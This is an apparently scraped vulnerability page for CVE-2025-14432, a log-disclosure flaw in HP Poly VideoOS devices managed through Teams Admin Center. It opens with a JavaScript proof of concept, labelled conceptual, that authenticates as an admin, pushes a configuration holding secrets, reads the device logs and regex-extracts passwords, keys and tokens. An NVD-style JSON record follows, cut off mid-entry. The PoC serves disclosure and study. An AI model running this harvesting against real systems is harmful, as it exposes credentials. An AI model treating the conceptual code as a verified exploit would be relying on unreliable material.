CVE-2025-14432

// CVE-2025-14432 PoC - Information Disclosure via TAC Logs // Note: This is a conceptual PoC. Actual exploitation requires valid admin credentials. // Step 1: Authenticate to Microsoft Teams Admin Center with admin credentials const authenticateTAC = async (username, password) => { const response = await fetch('https://admin.teams.microsoft.com/api/auth/login', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ username, password }) }); return response.json(); // Returns auth token }; // Step 2: Trigger device configuration change via TAC API const triggerConfigChange = async (authToken, deviceId, sensitiveConfig) => { const response = await fetch(`https://admin.teams.microsoft.com/api/devices/${deviceId}/config`, { method: 'PUT', headers: { 'Authorization': `Bearer ${authToken}`, 'Content-Type': 'application/json' }, body: JSON.stringify(sensitiveConfig) }); return response.json(); }; // Step 3: Access the log file containing sensitive data const accessLogFile = async (authToken, deviceId) => { const response = await fetch(`https://admin.teams.microsoft.com/api/devices/${deviceId}/logs`, { method: 'GET', headers: { 'Authorization': `Bearer ${authToken}` } }); const logs = await response.text(); // Sensitive data may be present in the logs const sensitiveData = extractSensitiveInfo(logs); return sensitiveData; }; // Helper function to extract sensitive information from logs const extractSensitiveInfo = (logContent) => { const patterns = [ /password[=:]\s*[^\s]+/gi, /api[_-]?key[=:]\s*[^\s]+/gi, /token[=:]\s*[^\s]+/gi, /secret[=:]\s*[^\s]+/gi ]; let extracted = []; patterns.forEach(pattern => { const matches = logContent.match(pattern); if (matches) { extracted = extracted.concat(matches); } }); return extracted; }; // Main execution (async () => { // Requires valid admin credentials const auth = await authenticateTAC('[email protected]', 'admin_password'); const token = auth.token; // Trigger configuration with potentially sensitive data const config = { serverUrl: 'https://provisioning.example.com', apiKey: 'super_secret_api_key_12345', username: 'service_account', password: 'service_password_xyz' }; await triggerConfigChange(token, 'device_001', config); // Access logs to retrieve sensitive information const leakedData = await accessLogFile(token, 'device_001'); console.log('Leaked sensitive data:', leakedData); })();

{"cve": {"id": "CVE-2025-14432", "sourceIdentifier": "[email protected]", "published": "2025-12-16T16:15:57.363", "lastModified": "2025-12-18T19:54:18.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In limited scenarios, sensitive data might be written to the log file if an admin uses Microsoft Teams Admin Center (TAC) to make device configuration changes. The affected log file is visible only to users with admin credentials. This is limited to Microsoft TAC and does not affect configuration changes made using the provisioning server or the device WebUI."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hp:poly_videoos:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.6.1-444242", "matchCriteriaId": "9236A14B-98A8-413F-BAB1-35AD7D2C4971"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hp:poly_eagleeye_cube:-:*:*:*:*:*:*:*", "matchCriteriaId": "77DFEDD4-9863-426F-8243-AFBA425F59AC"}, {"vulnerable": false, "criteria": "cpe:2.3:h:hp:poly_eagleeye_iv:-:*:*:*:*:*:*:*", "matchCriteriaId": "8DDFDBE1-1CA2-4A9E-BEF5-CC1CF32A44F8"}, {"vulnerable": false, "criteria": "cpe:2.3:h:hp:poly_studio_a2:-:*:*:*:*:*:*:*", "matchCriteriaId": "7AD75D83-4B2D-44A8-88BA-42A0FD58DCEF"}, {"vulnerable": false, "criteria": "cpe:2.3:h:hp:poly_studio_e60:-:*:*:*:*:*:*:*", "matchCriteriaId": "DBFB67C4-AD02-489C-B909-EFB20EE22EF6"}, {"vulnerable": false, "criteria": "cpe:2.3:h:hp:poly_studio_e70:-:*:*:*:*:*:*:*", "matchCriteriaId": "4EB25A1B-AC4D-467C-BC1F-B315D3201FBA"}, {"vulnerable": false, "criteria": "cpe:2.3:h:hp:poly_studio_g62:-:*:*:*:*:*:*:*", "matchCriteriaId": "FF7F293C-3F38-40DB-B909-F6E0C32219E0"}, {"vulnerable": false, "criteria": "cpe:2.3:h:hp:poly_studio_g7500:-:*:*:*:*:*:*:*", "matchCriteriaId": "C0B27E0D-4C00-42F8-8772-1C0B1D0F64FC"}, {"vulnerable": false, "criteria": "cpe:2.3:h:hp:poly_studio_usb:-:*:*:*:*:*:*:*", "matchCriteriaId": "E5E961C8-A34A-40A0-9C54-D77945649ECF"}, {"vulnerable": false, "criteria": "cpe:2.3:h:hp:poly_studio_x30:-:*:*:*:*:*:*:*", "matchCriteriaId": "58648CB8-9564-4EAB-8049-65B048EF8000"}, {"vulnerable": false, "criteria": "cpe:2.3:h:hp:poly_studio_x32:-:*:*:*:*:*:*:*", "matchCriteriaId": "B8E24FE0-2C63-4026-88FC-A8772C4FF891"}, {"vulnerable": false, "criteria": "cpe:2.3:h:hp:poly_studio_x50:-:*:*:*:*:*:*:*", "matchCriteriaId": "1424706A-4E51-4513-B962-59E9ABDD71E7"}, {"vulnerable": false, "criteria": "cpe:2.3:h:hp:poly_studio_x52:-:*:*:*:*:*:*:*", "matchCriteriaId": "06C69912-7DB0-4510-884B-3FFF7AC6B1FB"}, {"vulnerable": false, "criteria": "cpe:2.3:h:hp:poly_studio_x70:-:*:*:*:*:*:*:*", "matchCriteriaId": "8A94CC22-4C6E-4415-9AB3-E0A3EC7BD672"}, {"vulnerable": false, "criteria": "cpe:2 ... (truncated)